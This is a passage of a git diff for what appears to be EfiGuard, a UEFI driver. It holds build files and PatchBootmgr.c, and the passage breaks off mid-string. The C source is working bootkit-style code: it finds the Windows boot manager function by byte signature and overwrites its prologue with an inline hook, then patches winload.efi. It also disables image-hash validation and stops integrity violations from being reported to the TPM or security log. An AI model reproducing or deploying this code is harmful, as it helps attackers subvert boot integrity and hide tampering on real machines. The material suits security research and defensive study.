+ BaseMemoryLib + DevicePathLib + SynchronizationLib + MemoryAllocationLib + PrintLib + +[Protocols] + gEfiGuardDriverProtocolGuid ## PRODUCES + gEfiDriverSupportedEfiVersionProtocolGuid ## PRODUCES + gEfiDevicePathToTextProtocolGuid ## CONSUMES + gEfiDevicePathUtilitiesProtocolGuid ## CONSUMES + gEfiLoadedImageProtocolGuid ## CONSUMES + gEfiShellProtocolGuid ## SOMETIMES_CONSUMES + +[Guids] + gEfiGlobalVariableGuid ## SOMETIMES_PRODUCES + gEfiEventExitBootServicesGuid ## CONSUMES + gEfiEventVirtualAddressChangeGuid ## CONSUMES + gEfiAcpi20TableGuid ## SOMETIMES_CONSUMES + +[Depex] + gEfiSimpleTextOutProtocolGuid AND + gEfiLoadedImageProtocolGuid AND + gEfiVariableArchProtocolGuid AND + gEfiVariableWriteArchProtocolGuid AND + gEfiResetArchProtocolGuid AND + gEfiBdsArchProtocolGuid AND + gEfiRuntimeArchProtocolGuid + +[BuildOptions.Common] + # Put Zydis on a diet + *_*_*_CC_FLAGS = -D ZYAN_UEFI -D ZYAN_NO_LIBC -D ZYCORE_STATIC_DEFINE -D ZYDIS_STATIC_DEFINE -D ZYDIS_DISABLE_AVX512 -D ZYDIS_DISABLE_KNC -D ZYDIS_DISABLE_FORMATTER + + # This makes the decoder about twice as fast... sorry about the extra 5KB. Oh and usable PDBs please + MSFT:RELEASE_*_*_CC_FLAGS = /O2 /Ot /Zi + INTEL:RELEASE_*_*_CC_FLAGS = /O3 /Ot /Zi /Qopt-report-embed- + + *:DEBUG_*_*_PP_FLAGS = -D EFI_DEBUG + *:DEBUG_*_*_CC_FLAGS = -D EFI_DEBUG + + *:RELEASE_*_*_CC_FLAGS = -D MDEPKG_NDEBUG + +[BuildOptions.common.DXE_RUNTIME_DRIVER] + MSFT:*_*_*_DLINK_FLAGS = /SUBSYSTEM:EFI_RUNTIME_DRIVER,1.0 + INTEL:*_*_*_DLINK_FLAGS = /SUBSYSTEM:EFI_RUNTIME_DRIVER,1.0 diff --git a/EfiGuardDxe/EfiGuardDxe.vcxproj b/EfiGuardDxe/EfiGuardDxe.vcxproj new file mode 100644 index 0000000..3fa60fb --- /dev/null +++ b/EfiGuardDxe/EfiGuardDxe.vcxproj @@ -0,0 +1,96 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <Keyword>Win32Proj</Keyword> + <ProjectGuid>{D7484EBA-6357-4D81-B355-066E28D5DF72}</ProjectGuid> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <Import Project="$(SolutionDir)\EfiGuard.props" /> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ItemDefinitionGroup> + <ClCompile> + <PreprocessorDefinitions>ZYAN_UEFI;ZYAN_NO_LIBC;ZYCORE_STATIC_DEFINE;ZYDIS_STATIC_DEFINE;ZYDIS_DISABLE_AVX512;ZYDIS_DISABLE_KNC;ZYDIS_DISABLE_FORMATTER;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <AdditionalIncludeDirectories>$(SolutionDir)Include;Zydis/dependencies/zycore/include;Zydis/include;Zydis/src;Zydis/msvc;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <Optimization>MaxSpeed</Optimization> + </ClCompile> + <Link> + <AdditionalDependencies>UefiDriverEntryPoint.lib;BaseMemoryLib.lib;%(AdditionalDependencies)</AdditionalDependencies> + <SubSystem>EFI Runtime</SubSystem> + <SectionAlignment>4096</SectionAlignment> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="EfiGuardDxe.c" /> + <ClCompile Include="PatchBootmgr.c" /> + <ClCompile Include="PatchNtoskrnl.c" /> + <ClCompile Include="PatchWinload.c" /> + <ClCompile Include="pe.c" /> + <ClCompile Include="util.c" /> + <ClCompile Include="VisualUefi.c" /> + <ClCompile Include="Zydis\src\Decoder.c" /> + <ClCompile Include="Zydis\src\DecoderData.c" /> + <ClCompile Include="Zydis\src\Formatter.c" /> + <ClCompile Include="Zydis\src\FormatterATT.c" /> + <ClCompile Include="Zydis\src\FormatterBase.c" /> + <ClCompile Include="Zydis\src\FormatterBuffer.c" /> + <ClCompile Include="Zydis\src\FormatterIntel.c" /> + <ClCompile Include="Zydis\src\MetaInfo.c" /> + <ClCompile Include="Zydis\src\Mnemonic.c" /> + <ClCompile Include="Zydis\src\Register.c" /> + <ClCompile Include="Zydis\src\SharedData.c" /> + <ClCompile Include="Zydis\src\String.c" /> + <ClCompile Include="Zydis\src\Utils.c" /> + <ClCompile Include="Zydis\src\Zydis.c" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\Include\Protocol\EfiGuard.h" /> + <ClInclude Include="arc.h" /> + <ClInclude Include="EfiGuardDxe.h" /> + <ClInclude Include="ntdef.h" /> + <ClInclude Include="pe.h" /> + <ClInclude Include="util.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Allocator.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Bitset.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Comparison.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Defines.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Format.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\LibC.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Object.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Status.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\String.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Terminal.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Types.h" /> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Vector.h" /> + <ClInclude Include="Zydis\include\Zydis\Decoder.h" /> + <ClInclude Include="Zydis\include\Zydis\DecoderTypes.h" /> + <ClInclude Include="Zydis\include\Zydis\Formatter.h" /> + <ClInclude Include="Zydis\include\Zydis\MetaInfo.h" /> + <ClInclude Include="Zydis\include\Zydis\Mnemonic.h" /> + <ClInclude Include="Zydis\include\Zydis\Register.h" /> + <ClInclude Include="Zydis\include\Zydis\SharedTypes.h" /> + <ClInclude Include="Zydis\include\Zydis\ShortString.h" /> + <ClInclude Include="Zydis\include\Zydis\Status.h" /> + <ClInclude Include="Zydis\include\Zydis\Utils.h" /> + <ClInclude Include="Zydis\include\Zydis\Zydis.h" /> + <ClInclude Include="Zydis\include\Zydis\Internal\DecoderData.h" /> + <ClInclude Include="Zydis\include\Zydis\Internal\FormatterATT.h" /> + <ClInclude Include="Zydis\include\Zydis\Internal\FormatterBase.h" /> + <ClInclude Include="Zydis\include\Zydis\Internal\FormatterIntel.h" /> + <ClInclude Include="Zydis\include\Zydis\Internal\SharedData.h" /> + <ClInclude Include="Zydis\include\Zydis\Internal\String.h" /> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/EfiGuardDxe/EfiGuardDxe.vcxproj.filters b/EfiGuardDxe/EfiGuardDxe.vcxproj.filters new file mode 100644 index 0000000..9d4164d --- /dev/null +++ b/EfiGuardDxe/EfiGuardDxe.vcxproj.filters @@ -0,0 +1,200 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{2C3B8C5F-45D8-45DC-89D3-F9FB7889C9DA}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{548AA1C9-5601-4F15-B01D-53DC20744039}</UniqueIdentifier> + <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Source Files\Zydis"> + <UniqueIdentifier>{E64B1967-A437-4420-AC18-B9D6B9B1ADF2}</UniqueIdentifier> + </Filter> + <Filter Include="Header Files\Zydis"> + <UniqueIdentifier>{145DB519-2372-49B9-909D-3F2A5D213772}</UniqueIdentifier> + </Filter> + <Filter Include="Header Files\Zydis\Zycore"> + <UniqueIdentifier>{8E598E8D-FF52-43E7-9FA7-F9CDE9D3F771}</UniqueIdentifier> + </Filter> + <Filter Include="Header Files\Zydis\Internal"> + <UniqueIdentifier>{09843B9B-51DC-4418-9585-2ED4BD3F1643}</UniqueIdentifier> + </Filter> + <Filter Include="Header Files\Protocol"> + <UniqueIdentifier>{aa6da080-fea5-447e-8722-35a98038eb4e}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="EfiGuardDxe.c"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="pe.c"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="util.c"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="PatchBootmgr.c"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="PatchWinload.c"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="PatchNtoskrnl.c"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\Decoder.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\DecoderData.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\Formatter.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\FormatterATT.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\FormatterBase.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\FormatterBuffer.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\FormatterIntel.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\MetaInfo.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\Mnemonic.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\Register.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\SharedData.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\String.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\Utils.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="Zydis\src\Zydis.c"> + <Filter>Source Files\Zydis</Filter> + </ClCompile> + <ClCompile Include="VisualUefi.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ClInclude Include="EfiGuardDxe.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="pe.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="arc.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="util.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Allocator.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Bitset.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Comparison.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Defines.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Format.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\LibC.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Object.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Status.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\String.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Terminal.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Types.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\dependencies\zycore\include\Zycore\Vector.h"> + <Filter>Header Files\Zydis\Zycore</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Decoder.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\DecoderTypes.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Formatter.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\MetaInfo.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Mnemonic.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Register.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\SharedTypes.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\ShortString.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Status.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Utils.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Zydis.h"> + <Filter>Header Files\Zydis</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Internal\DecoderData.h"> + <Filter>Header Files\Zydis\Internal</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Internal\FormatterATT.h"> + <Filter>Header Files\Zydis\Internal</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Internal\FormatterBase.h"> + <Filter>Header Files\Zydis\Internal</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Internal\FormatterIntel.h"> + <Filter>Header Files\Zydis\Internal</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Internal\SharedData.h"> + <Filter>Header Files\Zydis\Internal</Filter> + </ClInclude> + <ClInclude Include="Zydis\include\Zydis\Internal\String.h"> + <Filter>Header Files\Zydis\Internal</Filter> + </ClInclude> + <ClInclude Include="..\Include\Protocol\EfiGuard.h"> + <Filter>Header Files\Protocol</Filter> + </ClInclude> + <ClInclude Include="ntdef.h"> + <Filter>Header Files</Filter> + </ClInclude> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/EfiGuardDxe/PatchBootmgr.c b/EfiGuardDxe/PatchBootmgr.c new file mode 100644 index 0000000..aa27135 --- /dev/null +++ b/EfiGuardDxe/PatchBootmgr.c @@ -0,0 +1,372 @@ +#include "EfiGuardDxe.h" + +#include <Library/BaseMemoryLib.h> + +VOID* /*t_ImgArchStartBootApplication_XX*/ gOriginalBootmgfwImgArchStartBootApplication = NULL; +UINT8 gBootmgfwImgArchStartBootApplicationBackup[sizeof(gHookTemplate)] = { 0 }; + +VOID* /*t_ImgArchStartBootApplication_XX*/ gOriginalBootmgrImgArchStartBootApplication = NULL; +UINT8 gBootmgrImgArchStartBootApplicationBackup[sizeof(gHookTemplate)] = { 0 }; + + +// +// Universal template bytes for a "faux call" inline hook +// +CONST UINT8 gHookTemplate[] = +{ +#if defined(MDE_CPU_X64) + 0x48, 0xB8, // mov rax, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // <addr> +#elif defined(MDE_CPU_IA32) + 0xB8, // mov eax, + 0x00, 0x00, 0x00, 0x00, // <addr> +#endif + 0x50, // push [e|r]ax + 0xC3 // ret +}; + + +// Signature for [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication +STATIC CONST UINT8 SigImgArchStartBootApplication[] = { + 0x41, 0xB8, 0x09, 0x00, 0x00, 0xD0 // mov r8d, 0D0000009h +}; + + +// +// Shared function called by [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication hooks to patch either winload.efi or bootmgr.efi +// +STATIC +EFI_STATUS +EFIAPI +HookedBootManagerImgArchStartBootApplication( + IN PBL_APPLICATION_ENTRY AppEntry, + IN VOID* ImageBase, + IN UINT32 ImageSize, + IN UINT32 BootOption, + OUT PBL_RETURN_ARGUMENTS ReturnArguments, + IN VOID* /*t_ImgArchStartBootApplication_XX*/ OriginalFunction, + IN CONST UINT8* OriginalFunctionBytes + ) +{ + // Restore the original function bytes that we replaced with our hook + CopyMem(OriginalFunction, OriginalFunctionBytes, sizeof(gHookTemplate)); + + // Clear the screen and paint it, paint it bl... green + CONST INT32 OriginalAttribute = SetConsoleTextColour(EFI_GREEN, TRUE); + + // Get the PE headers + CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(ImageBase, ImageSize); + INPUT_FILETYPE FileType = Unknown; + if (NtHeaders == NULL) + { + Print(L"\r\nHookedBootmanagerImgArchStartBootApplication: PE image at 0x%p with size 0x%lx is invalid!\r\nPress any key to continue anyway, or press ESC to reboot.\r\n", + ImageBase, ImageSize); + if (!WaitForKey()) + { + gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL); + } + goto CallOriginal; + } + + // Determine if we're starting winload.efi, bootmgr.efi (when booting a WIM), or something else + FileType = GetInputFileType((UINT8*)ImageBase, (UINTN)ImageSize); + if (FileType != WinloadEfi && FileType != BootmgrEfi) + { + // Nothing for us to do + DEBUG((DEBUG_INFO, "HookedBootmanagerImgArchStartBootApplication: booting application of type %S; not winload.efi or bootmgr.efi. No further patches will be applied.\r\n", + FileTypeToString(FileType))); + goto CallOriginal; + } + + // Print info + Print(L"[ %S!ImgArchStartBootApplication ]\r\n", (OriginalFunctionBytes == gBootmgrImgArchStartBootApplicationBackup ? L"bootmgr" : L"bootmgfw")); + Print(L"ImageBase: 0x%p\r\n", ImageBase); + Print(L"ImageSize: %lx\r\n", ImageSize); + Print(L"File type: %S\r\n", FileTypeToString(FileType)); + Print(L"EntryPoint: 0x%p\r\n", ((UINT8*)ImageBase + HEADER_FIELD(NtHeaders, AddressOfEntryPoint))); + Print(L"AppEntry:\r\n"); + Print(L" Signature: %a\r\n", AppEntry->Signature); + Print(L" Flags: %lx\r\n", AppEntry->Flags); + Print(L" GUID: %08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x\r\n", + AppEntry->Guid.Data1, AppEntry->Guid.Data2, AppEntry->Guid.Data3, + AppEntry->Guid.Data4[0], AppEntry->Guid.Data4[1], AppEntry->Guid.Data4[2], AppEntry->Guid.Data4[3], + AppEntry->Guid.Data4[4], AppEntry->Guid.Data4[5], AppEntry->Guid.Data4[6], AppEntry->Guid.Data4[7]); +#ifdef EFI_DEBUG + // Stuff likely no one cares about + Print(L" Unknown: %lx %lx %lx %lx\r\n", AppEntry->Unknown[0], AppEntry->Unknown[1], AppEntry->Unknown[2], AppEntry->Unknown[3]); + Print(L" BcdData:\r\n"); + Print(L" Type: %lx\r\n", AppEntry->BcdData.Type); + Print(L" DataOffset: %lx\r\n", AppEntry->BcdData.DataOffset); + Print(L" DataSize: %lx\r\n", AppEntry->BcdData.DataSize); + Print(L" ListOffset: %lx\r\n", AppEntry->BcdData.ListOffset); + Print(L" NextEntryOffset: %lx\r\n", AppEntry->BcdData.NextEntryOffset); + Print(L" Empty: %lx\r\n", AppEntry->BcdData.Empty); +#endif + + if (FileType == WinloadEfi) + { + // Patch winload.efi + PatchWinload(ImageBase, + NtHeaders); + } + else if (FileType == BootmgrEfi) + { + // Call PatchBootManager a second time; this time to patch bootmgr.efi + PatchBootManager(FileType, + ImageBase, + ImageSize); + } + +CallOriginal: + if (FileType == WinloadEfi || FileType == BootmgrEfi) + { + // Clear screen + gST->ConOut->EnableCursor(gST->ConOut, FALSE); + SetConsoleTextColour((UINTN)((OriginalAttribute >> 4) & 0x7), TRUE); + } + + // Call the original function to transfer execution to the boot application entry point; normally winload.efi!OslMain or bootmgr.efi!BmMain. + // If FileType != WinloadEfi && FileType != BootmgrEfi, no further patches will be applied because this is some other application being started. + CONST BOOLEAN VistaOrSevenBootManager = BootOption == MAX_UINT32; + return VistaOrSevenBootManager + ? ((t_ImgArchStartBootApplication_Vista)OriginalFunction)(AppEntry, ImageBase, ImageSize, ReturnArguments) + : ((t_ImgArchStartBootApplication_Eight)OriginalFunction)(AppEntry, ImageBase, ImageSize, BootOption, ReturnArguments); +} + +// +// bootmgfw!ImgArchEfiStartBootApplication hook to patch either winload.efi or bootmgr.efi, Windows Vista/7 version. +// This has to be a separate function from the bootmgr hook because their backup and return addresses will differ +// +STATIC +EFI_STATUS +EFIAPI +HookedBootmgfwImgArchEfiStartBootApplication_Vista( + IN PBL_APPLICATION_ENTRY AppEntry, + IN VOID* ImageBase, + IN UINT32 ImageSize, + OUT PBL_RETURN_ARGUMENTS ReturnArguments + ) +{ + return HookedBootManagerImgArchStartBootApplication(AppEntry, + ImageBase, + ImageSize, + MAX_UINT32, + ReturnArguments, + gOriginalBootmgfwImgArchStartBootApplication, + gBootmgfwImgArchStartBootApplicationBackup); +} + +// +// bootmgfw!ImgArch[Efi]StartBootApplication hook to patch either winload.efi or bootmgr.efi, Windows >= 8 version. +// This has to be a separate function from the bootmgr hook because their backup and return addresses will differ +// +STATIC +EFI_STATUS +EFIAPI +HookedBootmgfwImgArchStartBootApplication_Eight( + IN PBL_APPLICATION_ENTRY AppEntry, + IN VOID* ImageBase, + IN UINT32 ImageSize, + IN UINT32 BootOption, + OUT PBL_RETURN_ARGUMENTS ReturnArguments + ) +{ + return HookedBootManagerImgArchStartBootApplication(AppEntry, + ImageBase, + ImageSize, + BootOption, + ReturnArguments, + gOriginalBootmgfwImgArchStartBootApplication, + gBootmgfwImgArchStartBootApplicationBackup); +} + +// +// bootmgr!ImgArchEfiStartBootApplication hook to patch winload.efi, Windows Vista/7 version. +// This has to be a separate function from the bootmgfw hook because their backup and return addresses will differ +// +STATIC +EFI_STATUS +EFIAPI +HookedBootmgrImgArchEfiStartBootApplication_Vista( + IN PBL_APPLICATION_ENTRY AppEntry, + IN VOID* ImageBase, + IN UINT32 ImageSize, + OUT PBL_RETURN_ARGUMENTS ReturnArguments + ) +{ + return HookedBootManagerImgArchStartBootApplication(AppEntry, + ImageBase, + ImageSize, + MAX_UINT32, + ReturnArguments, + gOriginalBootmgrImgArchStartBootApplication, + gBootmgrImgArchStartBootApplicationBackup); +} + +// +// bootmgr!ImgArch[Efi]StartBootApplication hook to patch winload.efi, Windows >= 8 version. +// This has to be a separate function from the bootmgfw hook because their backup and return addresses will differ +// +STATIC +EFI_STATUS +EFIAPI +HookedBootmgrImgArchStartBootApplication_Eight( + IN PBL_APPLICATION_ENTRY AppEntry, + IN VOID* ImageBase, + IN UINT32 ImageSize, + IN UINT32 BootOption, + OUT PBL_RETURN_ARGUMENTS ReturnArguments + ) +{ + return HookedBootManagerImgArchStartBootApplication(AppEntry, + ImageBase, + ImageSize, + BootOption, + ReturnArguments, + gOriginalBootmgrImgArchStartBootApplication, + gBootmgrImgArchStartBootApplicationBackup); +} + +// +// Patches the Windows Boot Manager (either bootmgfw.efi or bootmgr.efi; normally the former unless booting a WIM file) +// +EFI_STATUS +EFIAPI +PatchBootManager( + IN INPUT_FILETYPE FileType, + IN VOID* ImageBase, + IN UINTN ImageSize + ) +{ + if (gBootmgfwHandle == NULL) + return EFI_NOT_STARTED; + + ASSERT(FileType == BootmgfwEfi || FileType == BootmgrEfi); + + // Get PE headers + CONST BOOLEAN PatchingBootmgrEfi = FileType == BootmgrEfi; + CONST CHAR16* ShortFileName = PatchingBootmgrEfi ? L"bootmgr" : L"bootmgfw"; + CONST PEFI_IMAGE_NT_HEADERS NtHeaders = RtlpImageNtHeaderEx(ImageBase, ImageSize); + EFI_STATUS Status; + if (NtHeaders == NULL) + { + Status = EFI_LOAD_ERROR; + Print(L"\r\nPatchBootManager: %S.efi PE image at 0x%p with size 0x%llx is invalid!\r\nPress any key to continue anyway, or press ESC to reboot.\r\n", + ShortFileName, ImageBase, ImageSize); + if (!WaitForKey()) + { + gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL); + } + goto Exit; + } + + // Print file and version info + UINT16 MajorVersion = 0, MinorVersion = 0, BuildNumber = 0, Revision = 0; + Status = GetPeFileVersionInfo(ImageBase, &MajorVersion, &MinorVersion, &BuildNumber, &Revision, NULL); + if (EFI_ERROR(Status)) + Print(L"\r\nPatchBootManager: WARNING: failed to obtain %S.efi version info. Status: %llx\r\n", ShortFileName, Status); + else + { + Print(L"\r\nPatching %S.efi v%u.%u.%u.%u...\r\n", ShortFileName, MajorVersion, MinorVersion, BuildNumber, Revision); + + // Check if this is a supported boot manager version. All patches should work on all versions since Vista SP1, + // except for the ImgpFilterValidationFailure patch because this function only exists on Windows 7 and higher. + if (BuildNumber < 6001) + { + Print(L"\r\nPatchBootManager: ERROR: Unsupported %S.efi image version.\r\n" + L"The minimum supported boot manager version is Windows Vista SP1.\r\n" + L"It is recommended to use the Windows 10 boot manager even when running an older OS.\r\n", ShortFileName); + Status = EFI_UNSUPPORTED; + goto Exit; + } + } + + // Find [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication + CONST CHAR16* FunctionName = BuildNumber >= 17134 ? L"ImgArchStartBootApplication" : L"ImgArchEfiStartBootApplication"; + CONST PEFI_IMAGE_SECTION_HEADER CodeSection = IMAGE_FIRST_SECTION(NtHeaders); + UINT8* Found = NULL; + Status = FindPattern(SigImgArchStartBootApplication, + 0xCC, + sizeof(SigImgArchStartBootApplication), + (UINT8*)ImageBase + CodeSection->VirtualAddress, + CodeSection->SizeOfRawData, + (VOID**)&Found); + if (EFI_ERROR(Status)) + { + Print(L"\r\nPatchBootManager: failed to find %S!%S signature. Status: %llx\r\n", ShortFileName, FunctionName, Status); + goto Exit; + } + + // Found signature; backtrack to function start + // Note: pOriginalAddress is a pointer to a (function) pointer, because the original address depends on the type of boot manager we are patching. + VOID **pOriginalAddress = PatchingBootmgrEfi ? &gOriginalBootmgrImgArchStartBootApplication : &gOriginalBootmgfwImgArchStartBootApplication; + *pOriginalAddress = (VOID*)BacktrackToFunctionStart(Found, MAX((UINT8*)ImageBase + CodeSection->VirtualAddress, Found - 1024)); + CONST VOID* OriginalAddress = *pOriginalAddress; + if (OriginalAddress == NULL) + { + Print(L"\r\nPatchBootManager: failed to find %S!%S function start [signature at 0x%p].\r\n", ShortFileName, FunctionName, (VOID*)Found); + Status = EFI_NOT_FOUND; + goto Exit; + } + + // Found + VOID* HookAddress; + if (BuildNumber < 9200) + HookAddress = PatchingBootmgrEfi ? (VOID*)&HookedBootmgrImgArchEfiStartBootApplication_Vista : (VOID*)&HookedBootmgfwImgArchEfiStartBootApplication_Vista; + else + HookAddress = PatchingBootmgrEfi ? (VOID*)&HookedBootmgrImgArchStartBootApplication_Eight : (VOID*)&HookedBootmgfwImgArchStartBootApplication_Eight; + UINT8* BackupAddress = PatchingBootmgrEfi ? gBootmgrImgArchStartBootApplicationBackup : gBootmgfwImgArchStartBootApplicationBackup; + Print(L"\r\nFound %S!%S at 0x%p.\r\n", ShortFileName, FunctionName, (VOID*)OriginalAddress); + Print(L"Hooked%S%S at 0x%p.\r\n", (PatchingBootmgrEfi ? L"Bootmgr" : L"Bootmgfw"), FunctionName, HookAddress); + + CONST EFI_TPL Tpl = gBS->RaiseTPL(TPL_HIGH_LEVEL); // Note: implies cli + + // Backup original function prologue + CopyMem(BackupAddress, (VOID*)OriginalAddress, sizeof(gHookTemplate)); + + // Place faux call (push addr, ret) at the start of the function to transfer execution to our hook + CopyMem((VOID*)OriginalAddress, (VOID*)gHookTemplate, sizeof(gHookTemplate)); + *(UINTN*)((UINT8*)OriginalAddress + 2) = (UINTN)HookAddress; + + gBS->RestoreTPL(Tpl); + + // Patch ImgpValidateImageHash to allow custom boot loaders. This is completely + // optional (unless booting a custom winload.efi), and failures are ignored + PatchImgpValidateImageHash(FileType, + (UINT8*)ImageBase, + NtHeaders); + + if (BuildNumber >= 7600) + { + // Patch ImgpFilterValidationFailure so it doesn't silently + // rat out every violation to a TPM or SI log. Also optional + PatchImgpFilterValidationFailure(FileType, + (UINT8*)ImageBase, + NtHeaders); + } + +Exit: + if (EFI_ERROR(Status)) + { + // Patch failed. Prompt user to ask what they want to do + Print(L"\r\nPress any key to continue anyway, or press ESC to 